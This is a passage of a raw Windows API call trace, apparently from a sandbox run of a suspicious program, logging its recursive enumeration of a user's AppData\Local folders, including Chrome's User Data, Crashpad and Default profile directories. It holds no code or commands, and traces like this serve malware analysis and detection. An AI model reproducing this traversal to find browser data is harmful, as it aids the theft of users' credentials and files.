lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="2.0", cAlternateFileName="")) returned 0 [0135.766] FindClose (in: hFindFile=0x91489b8 | out: hFindFile=0x91489b8) returned 1 [0135.766] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150688 | out: hHeap=0x3f0000) returned 1 [0135.766] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc924180, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xdc924180, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdc924180, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x91489b8, dwReserved1=0x13d180a, cFileName="bowsakkdestx.txt", cAlternateFileName="BOWSAK~1.TXT")) returned 1 [0135.766] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.766] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150688 [0135.766] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.766] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489b8, dwReserved1=0x13d180a, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0135.766] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.766] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x91506d8 [0135.766] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.766] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.766] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x91489b8 [0135.767] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.767] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.767] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 0 [0135.767] FindClose (in: hFindFile=0x91489b8 | out: hFindFile=0x91489b8) returned 1 [0135.767] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91506d8 | out: hHeap=0x3f0000) returned 1 [0135.767] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0x91489b8, dwReserved1=0x13d180a, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0135.767] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.767] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x91506d8 [0135.767] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.767] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9150688 | out: hHeap=0x3f0000) returned 1 [0135.767] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489b8, dwReserved1=0x13d180a, cFileName="Google", cAlternateFileName="")) returned 1 [0135.767] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.767] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150688 [0135.767] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.767] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.767] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x91489b8 [0135.768] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.768] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.768] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="Chrome", cAlternateFileName="")) returned 1 [0135.768] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.768] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.768] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x91489f8 [0135.768] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.768] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.768] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 1 [0135.768] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.768] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd680 [0135.768] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.768] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.768] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148a38 [0136.481] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0136.481] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.058] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="CertificateTransparency", cAlternateFileName="CERTIF~1")) returned 1 [0137.058] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0137.058] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0137.058] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0137.058] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0137.058] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.058] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148a78 [0137.059] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.059] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.060] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 0 [0137.060] FindClose (in: hFindFile=0x9148a78 | out: hFindFile=0x9148a78) returned 1 [0137.060] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b3f0 | out: hHeap=0x3f0000) returned 1 [0137.060] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="Crashpad", cAlternateFileName="")) returned 1 [0137.060] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0137.060] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.060] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148a78 [0137.061] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.061] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.061] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5beda0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="metadata", cAlternateFileName="")) returned 1 [0137.061] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.062] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0137.062] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.062] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="reports", cAlternateFileName="")) returned 1 [0137.062] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.062] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.062] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.062] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0137.062] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148ab8 [0137.062] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0137.062] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.062] FindNextFileA (in: hFindFile=0x9148ab8, lpFindFileData=0x36e158 | out: lpFindFileData=0x36e158*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 0 [0137.063] FindClose (in: hFindFile=0x9148ab8 | out: hFindFile=0x9148ab8) returned 1 [0137.063] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.063] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0137.063] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.063] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b370 [0137.063] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.063] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b3f0 | out: hHeap=0x3f0000) returned 1 [0137.063] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0137.063] FindClose (in: hFindFile=0x9148a78 | out: hFindFile=0x9148a78) returned 1 [0137.063] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b370 | out: hHeap=0x3f0000) returned 1 [0137.063] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0137.063] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="Default", cAlternateFileName="")) returned 1 [0137.063] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0137.063] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0137.063] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x9148a78 [0137.070] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0137.070] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0137.158] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148ab8, dwReserved1=0x13d180a, cFileName="Cache", cAlternateFileName="")) returned 1 